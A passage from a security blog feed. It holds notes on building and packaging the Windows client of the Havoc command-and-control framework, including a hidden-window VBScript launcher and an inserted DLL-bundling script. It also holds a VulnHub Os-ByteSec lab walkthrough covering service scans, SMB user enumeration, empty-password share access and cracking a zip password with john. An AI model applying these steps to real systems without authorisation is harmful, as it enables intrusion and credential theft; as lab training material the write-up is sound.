class="line"><span class="keyword">set</span>(PYTHON_LIBRARIES <span class="variable">${Python_LIBRARIES}</span>)</span><br><span class="line"><span class="keyword">message</span>(<span class="string">"Apple - Using Python:${Python_VERSION_MAJOR} - Libraries:${PYTHON_LIBRARIES} - IncludeDirs: ${PYTHON_INCLUDE_DIR}"</span>)</span><br><span class="line"><span class="keyword">elseif</span>(UNIX)</span><br><span class="line"><span 
class="keyword">find_package</span>(PythonLibs <span class="number">3</span> REQUIRED)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Add an else branch so the Python libraries are also located on Windows</span></span><br><span class="line"><span class="keyword">else</span>()</span><br><span class="line"><span class="keyword">find_package</span>(PythonLibs <span class="number">3</span> REQUIRED)</span><br><span class="line"><span class="keyword">set</span>(PYTHONLIBS_VERSION_STRING $ENV{PY_VERSION})</span><br><span class="line"><span class="keyword">endif</span>()</span><br></pre></td></tr></table></figure><h3 id="2-5、run-error-Python"><a href="#2-5、run-error-Python" class="headerlink" title="2.5 run error: Python"></a>2.5 run error: Python</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Fatal Python error: init_fs_encoding: failed to get the Python codec of the filesystem encoding</span><br><span class="line">Python runtime state: core initialized</span><br><span class="line">ModuleNotFoundError: No module named 'encodings'</span><br><span class="line">Current thread 0x00005280 (most recent call first):</span><br><span class="line"><no Python frame></span><br></pre></td></tr></table></figure><p>The embedded interpreter starts but cannot locate its standard library (it dies while importing <code>encodings</code>), because <code>Py_Initialize()</code> has no PYTHONHOME to search. There are two ways to fix this.</p><h4 id="方法1、设置-python-的路径-(不推荐-因为写死python路径会导致可移植性)"><a href="#方法1、设置-python-的路径-(不推荐-因为写死python路径会导致可移植性)" class="headerlink" title="Method 1: hard-code the Python paths (not recommended: a fixed path breaks portability)"></a>Method 1: hard-code the Python paths (not recommended: a fixed path breaks portability)</h4><p>Edit Client/Source/UserInterface/HavocUI.cpp at line 191:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Init Python Interpreter</span></span><br><span class="line">{</span><br><span class="line"><span class="comment">// set python home path and python lib path</span></span><br><span class="line">Py_SetPythonHome(<span class="string">L"C:\\msys64\\mingw64\\bin"</span>);</span><br><span class="line">Py_SetPath(<span class="string">L"C:\\msys64\\mingw64\\lib\\python3.10"</span>);</span><br><span class="line"></span><br><span class="line">PyImport_AppendInittab( <span class="string">"emb"</span>, emb::PyInit_emb );</span><br><span class="line">PyImport_AppendInittab( <span class="string">"havocui"</span>, PythonAPI::HavocUI::PyInit_HavocUI );</span><br><span class="line">PyImport_AppendInittab( <span class="string">"havoc"</span>, PythonAPI::Havoc::PyInit_Havoc );</span><br><span class="line">Py_Initialize();</span><br><span class="line">PyImport_ImportModule( <span class="string">"emb"</span> );</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> ( <span class="keyword">auto</span>& ScriptPath : dbManager->GetScripts() )</span><br><span class="line">{</span><br><span class="line">Widgets::ScriptManager::AddScript( ScriptPath );</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="方法2、在系统环境变量中添加变量"><a href="#方法2、在系统环境变量中添加变量" class="headerlink" title="Method 2: add the variables to the system environment"></a>Method 2: add the variables to the system environment</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td 
class="code"><pre><span class="line">PYTHONHOME C:\Program Files\Python310</span><br><span class="line">PYTHONPATH C:\Program Files\Python310\Lib</span><br></pre></td></tr></table></figure><p>Whichever method you choose, the directories should belong to the same Python 3.10 build the client was linked against (the MSYS2 mingw64 one): pure-Python modules from another build will import, but its compiled extension modules may fail to load.</p><h2 id="3、程序打包发布"><a href="#3、程序打包发布" class="headerlink" title="3. Packaging for distribution"></a>3. Packaging for distribution</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">make</span><br><span class="line"></span><br><span class="line">ldd.exe ./Havoc.exe | grep mingw64 | awk -F\> '{print $2}' | sed 's/ (0x.*//' | xargs -I {} cp {} ./</span><br><span class="line"></span><br><span class="line"># Qt is linked statically, so the Qt DLLs do not need to be bundled</span><br><span class="line"># windeployqt ./Havoc.exe</span><br></pre></td></tr></table></figure><p>Havoc.exe depends on the Python runtime library and needs the <code>PYTHONHOME</code> and <code>PYTHONPATH</code> variables, so ship a Python environment inside the client directory and start the client through a small batch file that sets them relative to its own location.</p><p>Start_Havoc.bat</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line"></span><br><span class="line">REM Change to the launcher's own directory so the relative paths below work from any working directory</span><br><span class="line">cd /d "%~dp0"</span><br><span class="line"></span><br><span class="line">REM Resolve the absolute path of the bundled python3 folder</span><br><span class="line">for %%I in ("%cd%\python3") do set "PYTHONHOME=%%~fI"</span><br><span class="line"></span><br><span class="line">REM Point PYTHONPATH at the bundled standard library</span><br><span class="line">set "PYTHONPATH=%PYTHONHOME%\lib"</span><br><span class="line"></span><br><span class="line">REM 
Show the variables that were set</span><br><span class="line">echo PYTHONHOME=%PYTHONHOME%</span><br><span class="line">echo PYTHONPATH=%PYTHONPATH%</span><br><span class="line"></span><br><span class="line">havoc.exe</span><br></pre></td></tr></table></figure><p><img src="/2023/10/21/Havoc-Windows-Client/image-20231021155505703.png" alt="image-20231021155505703"></p><p>A two-line VBScript launches the batch file without the black cmd window:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">set shell=wscript.createObject("wscript.shell") </span><br><span class="line">run=shell.Run("Start_Havoc.bat", 0)</span><br></pre></td></tr></table></figure><h2 id="参考链接"><a href="#参考链接" class="headerlink" title="References"></a>References</h2><p><a href="https://github.com/far-morningstar/Havoc-win">far-morningstar/Havoc-win: Havoc Client build for win64 (github.com)</a></p>]]></content>
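The one-line `ldd | grep | awk | sed | xargs cp` pipeline in the packaging step above does the job, but it silently skips anything ldd reports as `not found`, and a DLL that is unresolved on the build box will be unresolved on the user's machine too. The functions below, added here as an example and not part of the original post or of the Havoc project, parse `ldd.exe` output field by field (`name => path (address)`), copy only the `/mingw64/` libraries, and refuse to package while any dependency is unresolved. `SAMPLE_LDD` is a constructed, shortened `ldd.exe ./Havoc.exe` listing with made-up addresses; `bundle_dlls` is the function you would actually run in the MSYS2 shell.

```shell
#!/bin/sh
# Added example (not from the original post): collect the MSYS2/mingw64 DLLs a
# freshly built Havoc.exe needs, and stop if ldd could not resolve something.

# ldd prints one dependency per line as:  name => path (0xaddress)
# Field 3 is the resolved path, or the word "not" in "name => not found".

# Print the /mingw64/... paths from ldd output given on stdin, skipping the
# Windows system DLLs (/c/Windows/...) that every machine already has.
mingw_dll_paths() {
  awk '$2 == "=>" { if (index($3, "/mingw64/") == 1) print $3 }'
}

# Print the names of dependencies ldd could not resolve.
missing_dlls() {
  awk '$2 == "=>" { if ($3 == "not") print $1 }'
}

# Count the mingw64 DLLs in an ldd listing passed as a string.
count_mingw_dlls() {
  printf '%s\n' "$1" | mingw_dll_paths | wc -l | tr -d ' '
}

# Copy each mingw64 DLL next to the executable. Returns 1 and copies nothing
# if any dependency is unresolved, so a broken package is never produced.
bundle_dlls() {
  exe="$1"
  dest="${2:-.}"
  listing="$(ldd "$exe")"
  missing="$(printf '%s\n' "$listing" | missing_dlls)"
  if [ -n "$missing" ]; then
    printf 'refusing to package, unresolved DLLs:\n%s\n' "$missing"
    return 1
  fi
  printf '%s\n' "$listing" | mingw_dll_paths | while IFS= read -r dll; do
    cp "$dll" "$dest/"
  done
}

# Constructed sample of `ldd.exe ./Havoc.exe` output (shortened; addresses made up).
SAMPLE_LDD='        ntdll.dll => /c/Windows/SYSTEM32/ntdll.dll (0x7ff8a0000000)
        KERNEL32.DLL => /c/Windows/System32/KERNEL32.DLL (0x7ff89e000000)
        libstdc++-6.dll => /mingw64/bin/libstdc++-6.dll (0x7ff870000000)
        libgcc_s_seh-1.dll => /mingw64/bin/libgcc_s_seh-1.dll (0x7ff871000000)
        libwinpthread-1.dll => /mingw64/bin/libwinpthread-1.dll (0x7ff872000000)
        libspdlog.dll => not found'

# Example usage in the MSYS2 shell, after `make`:
#   bundle_dlls ./Havoc.exe .
```

Run it from the MSYS2 shell where `ldd.exe` resolves the mingw64 paths; with the sample listing above it would stop on `libspdlog.dll`, which is exactly the dependency you would otherwise discover only when the client fails to start on a clean machine.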
<categories>
<category> Tools </category>
</categories>
<tags>
<tag> Tool Development </tag>
</tags>
</entry>
<entry>
<title>Os-ByteSec</title>
<link href="/2023/10/21/Os-ByteSec/"/>
<url>/2023/10/21/Os-ByteSec/</url>
<content type="html"><![CDATA[<h1 id="Os-ByteSec"><a href="#Os-ByteSec" class="headerlink" title="Os-ByteSec"></a>Os-ByteSec</h1><p>VM download: <a href="https://www.vulnhub.com/entry/hacknos-os-bytesec,393/">hackNos: Os-Bytesec ~ VulnHub</a></p><p>The goals are the unprivileged user's <strong>user.txt</strong> and root's <strong>root.txt</strong>.</p><h2 id="靶机配置"><a href="#靶机配置" class="headerlink" title="VM setup"></a>VM setup</h2><p>For the VM's network adapter configuration, see my earlier <a href="https://blog.csdn.net/witwitwiter/article/details/119889384?spm=1001.2014.3001.5501">Os-hackNos-1 write-up (witwitwiter's CSDN blog)</a>.</p><h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="Penetration test"></a>Penetration test</h2><p>Start with an nmap service scan. Note that SSH listens on the non-standard port 2525 and that Samba is exposed on 139/445:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">└─# nmap -sV 192.168.5.135 </span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 19:34 CST</span><br><span class="line">Nmap scan report for 192.168.5.135 (192.168.5.135)</span><br><span class="line">Host is up (0.00012s latency).</span><br><span class="line">Not shown: 996 closed ports</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">80/tcp open http Apache httpd 2.4.18 ((Ubuntu))</span><br><span class="line">139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</span><br><span class="line">445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</span><br><span class="line">2525/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; 
protocol 2.0)</span><br><span class="line">MAC Address: 00:0C:29:13:48:B6 (VMware)</span><br><span class="line">Service Info: Host: NITIN; OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 11.79 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Next, brute-force web directories with <code>dirsearch</code>:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td 
class="code"><pre><span class="line">─# dirsearch -u "http://192.168.5.135/"</span><br><span class="line"></span><br><span class="line"> _|. _ _ _ _ _ _|_ v0.4.1</span><br><span class="line"> (_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877</span><br><span class="line"></span><br><span class="line">Output File: /root/.dirsearch/reports/192.168.5.135/_21-08-29_19-39-13.txt</span><br><span class="line"></span><br><span class="line">Error Log: /root/.dirsearch/logs/errors-21-08-29_19-39-13.log</span><br><span class="line"></span><br><span class="line">Target: http://192.168.5.135/</span><br><span class="line"></span><br><span class="line">[19:39:13] Starting: </span><br><span class="line">[19:39:13] 301 - 311B - /js -> http://192.168.5.135/js/</span><br><span class="line">[19:39:13] 301 - 313B - /html -> http://192.168.5.135/html/</span><br><span class="line">[19:39:14] 403 - 278B - /.ht_wsr.txt </span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess.bak1</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess_extra</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess.sample</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess.save</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess_sc</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccessOLD2</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess_orig</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccessBAK</span><br><span class="line">[19:39:14] 403 - 278B - /.htm</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccessOLD</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess.orig</span><br><span class="line">[19:39:14] 403 - 278B - /.htpasswd_test </span><br><span class="line">[19:39:14] 403 - 278B - /.html</span><br><span class="line">[19:39:14] 403 - 278B - /.htpasswds </span><br><span 
class="line">[19:39:14] 403 - 278B - /.httr-oauth </span><br><span class="line">[19:39:21] 301 - 312B - /css -> http://192.168.5.135/css/ </span><br><span class="line">[19:39:23] 301 - 316B - /gallery -> http://192.168.5.135/gallery/ </span><br><span class="line">[19:39:23] 200 - 738B - /html/ </span><br><span class="line">[19:39:23] 301 - 312B - /img -> http://192.168.5.135/img/ </span><br><span class="line">[19:39:23] 200 - 3KB - /index.html </span><br><span class="line">[19:39:23] 200 - 2KB - /js/ </span><br><span class="line">[19:39:25] 301 - 313B - /news -> http://192.168.5.135/news/ </span><br><span class="line">[19:39:27] 403 - 278B - /server-status </span><br><span class="line">[19:39:27] 403 - 278B - /server-status/</span><br><span class="line"> </span><br><span class="line">Task Completed </span><br></pre></td></tr></table></figure><p>Test SMB security with nmap</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span 
class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">└─# nmap -v -p139,445 --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.5.135</span><br><span class="line"></span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 19:47 CST</span><br><span class="line">NSE: Loaded 11 scripts for scanning.</span><br><span class="line">NSE: Script Pre-scanning.</span><br><span class="line">Initiating NSE at 19:47</span><br><span class="line">Completed NSE at 19:47, 0.00s elapsed</span><br><span class="line">Initiating ARP Ping Scan at 19:47</span><br><span class="line">Scanning 192.168.5.135 [1 port]</span><br><span class="line">Completed ARP Ping Scan at 19:47, 0.09s elapsed (1 total hosts)</span><br><span class="line">Initiating Parallel DNS resolution of 1 host. at 19:47</span><br><span class="line">Completed Parallel DNS resolution of 1 host. 
at 19:47, 0.01s elapsed</span><br><span class="line">Initiating SYN Stealth Scan at 19:47</span><br><span class="line">Scanning 192.168.5.135 (192.168.5.135) [2 ports]</span><br><span class="line">Discovered open port 445/tcp on 192.168.5.135</span><br><span class="line">Discovered open port 139/tcp on 192.168.5.135</span><br><span class="line">Completed SYN Stealth Scan at 19:47, 0.15s elapsed (2 total ports)</span><br><span class="line">NSE: Script scanning 192.168.5.135.</span><br><span class="line">Initiating NSE at 19:47</span><br><span class="line">Completed NSE at 19:47, 5.17s elapsed</span><br><span class="line">Nmap scan report for 192.168.5.135 (192.168.5.135)</span><br><span class="line">Host is up (0.00049s latency).</span><br><span class="line"></span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">139/tcp open netbios-ssn</span><br><span class="line">445/tcp open microsoft-ds</span><br><span class="line">MAC Address: 00:0C:29:13:48:B6 (VMware)</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)</span><br><span class="line">|_smb-vuln-ms10-061: false</span><br><span class="line">| smb-vuln-regsvc-dos: </span><br><span class="line">| VULNERABLE:</span><br><span class="line">| Service regsvc in Microsoft Windows systems vulnerable to denial of service</span><br><span class="line">| State: VULNERABLE</span><br><span class="line">| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference</span><br><span class="line">| pointer. This script will crash the service if it is vulnerable. 
This vulnerability was discovered by Ron Bowes</span><br><span class="line">| while working on smb-enum-sessions.</span><br><span class="line">|_ </span><br><span class="line"></span><br><span class="line">NSE: Script Post-scanning.</span><br><span class="line">Initiating NSE at 19:47</span><br><span class="line">Completed NSE at 19:47, 0.00s elapsed</span><br><span class="line">Read data files from: /usr/bin/../share/nmap</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds</span><br><span class="line"> Raw packets sent: 3 (116B) | Rcvd: 3 (116B)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Testing with smbmap shows that anonymous (guest) access is allowed, but without any share permissions</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">└─# smbmap -H 192.168.5.135 1 ⨯</span><br><span class="line">[+] Guest session IP: 192.168.5.135:445 Name: 192.168.5.135 </span><br><span class="line"> Disk Permissions Comment</span><br><span class="line"> ---- ----------- -------</span><br><span class="line"> print$ NO ACCESS Printer Drivers</span><br><span class="line"> IPC$ NO ACCESS IPC Service (nitin server (Samba, Ubuntu))</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Test with enum4linux</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 
class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">└─# enum4linux -U 192.168.5.135</span><br><span class="line">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Aug 29 20:11:41 2021</span><br><span class="line"></span><br><span class="line"> ========================== </span><br><span class="line">| Target Information |</span><br><span class="line"> ========================== </span><br><span class="line">Target ........... 192.168.5.135</span><br><span class="line">RID Range ........ 500-550,1000-1050</span><br><span class="line">Username ......... ''</span><br><span class="line">Password ......... ''</span><br><span class="line">Known Usernames .. 
administrator, guest, krbtgt, domain admins, root, bin, none</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> ===================================================== </span><br><span class="line">| Enumerating Workgroup/Domain on 192.168.5.135 |</span><br><span class="line"> ===================================================== </span><br><span class="line">[+] Got domain/workgroup name: WORKGROUP</span><br><span class="line"></span><br><span class="line"> ====================================== </span><br><span class="line">| Session Check on 192.168.5.135 |</span><br><span class="line"> ====================================== </span><br><span class="line">[+] Server 192.168.5.135 allows sessions using username '', password ''</span><br><span class="line"></span><br><span class="line"> ============================================ </span><br><span class="line">| Getting domain SID for 192.168.5.135 |</span><br><span class="line"> ============================================ </span><br><span class="line">Domain Name: WORKGROUP</span><br><span class="line">Domain Sid: (NULL SID)</span><br><span class="line">[+] Can't determine if host is part of domain or part of a workgroup</span><br><span class="line"></span><br><span class="line"> ============================== </span><br><span class="line">| Users on 192.168.5.135 |</span><br><span class="line"> ============================== </span><br><span class="line">index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: smb Name: Desc: </span><br><span class="line"></span><br><span class="line">user:[smb] rid:[0x3e8]</span><br><span class="line">enum4linux complete on Sun Aug 29 20:11:41 2021</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Run <code>enum4linux 192.168.5.135</code> directly with the default parameters</p><p><img src="/2023/10/21/Os-ByteSec/image-20230628230305489.png" 
alt="image-20230628230305489"></p><p>This yields three users: sagar, blackjax and smb</p><p>After testing, only the smb user can read the share without entering a password; that is, the smb user has an empty password.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">└─# smbmap -u smb -H 192.168.5.135 </span><br><span class="line">[+] IP: 192.168.5.135:445 Name: 192.168.5.135 </span><br><span class="line"> Disk Permissions Comment</span><br><span class="line"> ---- ----------- -------</span><br><span class="line"> print$ READ ONLY Printer Drivers</span><br><span class="line"> IPC$ NO ACCESS IPC Service (nitin server (Samba, Ubuntu))</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Log in with smbclient; when prompted for a password, just press Enter</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">└─# smbclient //192.168.5.135/smb -U smb</span><br><span class="line">Enter WORKGROUP\smb's password: </span><br><span class="line">Try "help" to get a list of possible commands.</span><br><span class="line">smb: \> </span><br></pre></td></tr></table></figure><p>List the files with ls</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">smb: \> ls</span><br><span class="line"> . D 0 Mon Nov 4 19:50:37 2019</span><br><span class="line"> .. 
D 0 Mon Nov 4 19:37:28 2019</span><br><span class="line"> main.txt N 10 Mon Nov 4 19:45:38 2019</span><br><span class="line"> safe.zip N 3424907 Mon Nov 4 19:50:37 2019</span><br><span class="line"></span><br><span class="line"> 9204224 blocks of size 1024. 6831688 blocks available</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Download both files with get</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">smb: \> get main.txt </span><br><span class="line">getting file \main.txt of size 10 as main.txt (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)</span><br><span class="line">smb: \> get safe.zip </span><br><span class="line">getting file \safe.zip of size 3424907 as safe.zip (65581.0 KiloBytes/sec) (average 57666.3 KiloBytes/sec)</span><br></pre></td></tr></table></figure><p>View the file contents</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">└─# cat main.txt </span><br><span class="line">helo</span><br></pre></td></tr></table></figure><p>Unzipping safe.zip shows that it is password-protected</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">└─# unzip safe.zip </span><br><span class="line">Archive: safe.zip</span><br><span class="line">[safe.zip] secret.jpg password: </span><br><span class="line"> skipping: secret.jpg incorrect password</span><br><span class="line"> skipping: user.cap incorrect password</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Crack the password with john</p><figure 
class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">┌──(root💀kali)-[~]</span><br><span class="line">└─# zip2john safe.zip > safepass 82 ⨯</span><br><span class="line">ver 2.0 efh 5455 efh 7875 safe.zip/secret.jpg PKZIP Encr: 2b chk, TS_chk, cmplen=60550, decmplen=62471, crc=6D48091C</span><br><span class="line">ver 2.0 efh 5455 efh 7875 safe.zip/user.cap PKZIP Encr: 2b chk, TS_chk, cmplen=3364011, decmplen=6920971, crc=717BA9D6</span><br><span class="line">NOTE: It is assumed that all files in each archive have the same password.</span><br><span class="line">If that is not the case, the hash may be uncrackable. 
To avoid this, use</span><br><span class="line">option -o to pick a file at a time.</span><br><span class="line"> </span><br><span class="line">┌──(root💀kali)-[~]</span><br><span class="line">└─# john safepass </span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password hash (PKZIP [32/64])</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Proceeding with single, rules:Single</span><br><span class="line">Press 'q' or Ctrl-C to abort, almost any other key for status</span><br><span class="line">Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Almost done: Processing the remaining buffered candidate passwords, if any.</span><br><span class="line">Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist</span><br><span class="line">hacker1 (safe.zip)</span><br><span class="line">1g 0:00:00:00 DONE 2/3 (2021-08-29 21:06) 20.00g/s 1680Kp/s 1680Kc/s 1680KC/s fireballs..faithfaith</span><br><span class="line">Use the "--show" option to display all of the cracked passwords reliably</span><br><span class="line">Session completed</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Alternatively, use <code>fcrackzip</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 
